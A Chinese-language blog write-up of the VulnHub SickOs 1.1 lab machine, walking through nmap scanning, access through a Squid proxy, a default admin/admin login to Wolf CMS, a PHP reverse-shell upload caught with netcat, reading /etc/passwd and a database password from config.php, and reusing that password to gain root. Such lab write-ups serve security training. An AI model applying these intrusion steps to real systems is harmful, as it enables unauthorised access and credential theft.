vulnhub靶机渗透[SickOs-1-1]

Posted on Edited on In Views: Word count in article: 1.5k Reading time ≈ 6 mins.

名称

名称:SickOs: 1.1
发布日期:2015年12月11日

下载

  • Download (Mirror): https://download.vulnhub.com/sickos/sick0s1.1.7z
  • Download (Torrent): https://download.vulnhub.com/sickos/sick0s1.1.7z.torrent

描述

1
2
3
4
5
6
7
Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt
Tester(s)...: h1tch1
Twitter.....: https://twitter.com/D4rk36
1
该CTF明确地类比了如何在网络上执行黑客策略,以在安全的环境中危害网络。这个虚拟与在OSCP中遇到的实验室非常相似。目的是破坏网络/计算机并在其上获得管理root权限。

文件信息:

1
2
3
4
FileName: sick0s1.1.7z
File Size: 652.52 MB
MD5: 396e46897c54da6ded6604b861c806b7
SHA1: 3578a10ba92f860c2f0d8934ec5a9bbffc4c7859

虚拟机:

1
2
3
Format: 7z
Operating System: Ubuntu
Tested: VMware Workstation 11.0.0 build-2305329

联网:

1
2
DHCP服务:已启用
IP地址:自动分配

信息收集

上nmap

1
2
3
4
root@kali:~# nmap -sn -v 192.168.66.*
Nmap scan report for 192.168.66.13
Host is up (0.00011s latency).
MAC Address: 00:0C:29:A3:1D:35 (VMware)
1
2
3
4
5
root@kali:~# nmap -p- -sV -v 192.168.66.13
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
3128/tcp open   http-proxy Squid http proxy 3.1.19
8080/tcp closed http-proxy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
root@kali:~# nmap -p 22,3128,8080 -A -T4 -v 192.168.66.13 --script=vuln
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
3128/tcp open   http-proxy Squid http proxy 3.1.19
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-server-header: squid/3.1.19
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| vulners: 
|   cpe:/a:squid-cache:squid:3.1.19: 
|       CVE-2016-4054   6.8     https://vulners.com/cve/CVE-2016-4054
|       CVE-2016-4052   6.8     https://vulners.com/cve/CVE-2016-4052
|       CVE-2016-4051   6.8     https://vulners.com/cve/CVE-2016-4051
|       CVE-2014-7142   6.4     https://vulners.com/cve/CVE-2014-7142
|       CVE-2014-7141   6.4     https://vulners.com/cve/CVE-2014-7141
|       CVE-2016-4556   5.0     https://vulners.com/cve/CVE-2016-4556
|       CVE-2016-4555   5.0     https://vulners.com/cve/CVE-2016-4555
|       CVE-2016-10002  5.0     https://vulners.com/cve/CVE-2016-10002
|       CVE-2012-5643   5.0     https://vulners.com/cve/CVE-2012-5643
|_      CVE-2016-4053   4.3     https://vulners.com/cve/CVE-2016-4053
8080/tcp closed http-proxy

在nmap扫描期间观察到3128上存在有关代理的内容,那么尝试在firefox浏览器中手动建立代理。在HTTP代理和端口3128中提供VM的IP,如下图所示:

访问robotx.txt文件,查看里面的内容,然后进入wolfcms目录

getshell

对Wolf CMS不太了解,所以搜索了Google以了解后台管理页面的位置。当通过Google找到登录页面时,将其打开。需要用户名和密码。默认情况下,用户名和密码分别为admin和admin,登录到管理控制台,然后选择文件选项卡,然后选择上传文件选项。

后台

1
http://192.168.66.13/wolfcms/?/admin/login

账号密码:admin/admin

进入之后找到上传点上传php-reverse-shell

然后浏览器访问phpreverseshell,在kali端使用nc监听,反弹回了shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
192.168.66.13: inverse host lookup failed: Unknown host
connect to [192.168.66.6] from (UNKNOWN) [192.168.66.13] 44079
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux
 10:47:19 up  1:40,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ whoami
www-data
$ pwd 
/

提权

查看/etc/passwd文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

在网站根目录下面找到配置文件中的数据库用户名和密码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ pwd
/var/www/wolfcms
$ cat config.php
<?php 

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');

...

观察它提供的所有用户详细信息,会发现用户sickos的值为1000:1000,这意味着sickos是第一个用户。因此,在这里嗅到了root权限用户的气味,因为它是第一个用户。因此,使用发现的密码john@123将用户切换为sickos。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@SickOs:/var/www/wolfcms$ ls
ls
CONTRIBUTING.md  composer.json  docs         index.php  robots.txt
README.md        config.php     favicon.ico  public     wolf
www-data@SickOs:/var/www/wolfcms$ su sickos
su sickos
Password: john@123

sickos@SickOs:/var/www/wolfcms$ id
id
uid=1000(sickos) gid=1000(sickos) groups=1000(sickos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),111(lpadmin),112(sambashare)
sickos@SickOs:/var/www/wolfcms$ whoami
whoami
sickos
sickos@SickOs:/var/www/wolfcms$ cd /root
cd /root
bash: cd: /root: Permission denied
sickos@SickOs:/var/www/wolfcms$ sudo -s
sudo -s
[sudo] password for sickos: john@123

root@SickOs:/var/www/wolfcms# id
id
uid=0(root) gid=0(root) groups=0(root)
root@SickOs:/var/www/wolfcms# whoami
whoami
root
root@SickOs:/var/www/wolfcms# cd /root
cd /root
root@SickOs:/root# ls
ls
a0216ea4d51874464078c618298b1367.txt
root@SickOs:/root# cat a0216ea4d51874464078c618298b1367.txt
cat a0216ea4d51874464078c618298b1367.txt
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying

到此为止成功获取到了root权限并读取了flag

其它提权方法参考

  • 2015-slickOs-1.1
  • write-up-sickos-1-1
  • vulnhub-writeup-SickOs-1-1

就是利用ShellShock漏洞和自动定时任务提权,很简单,在这里就不多做演示了

知识点总结

  • 浏览器设置http-proxy Squid http proxy代理访问
  • 弱口令
  • 文件上传
  • 用户值为1000:1000-第一用户提权

Game over

不好意思,这次还是没有找到希腊某位大佬的傻瓜式一键通关脚本,i am so sorry about this…It’s a pity…

The end,to be continue…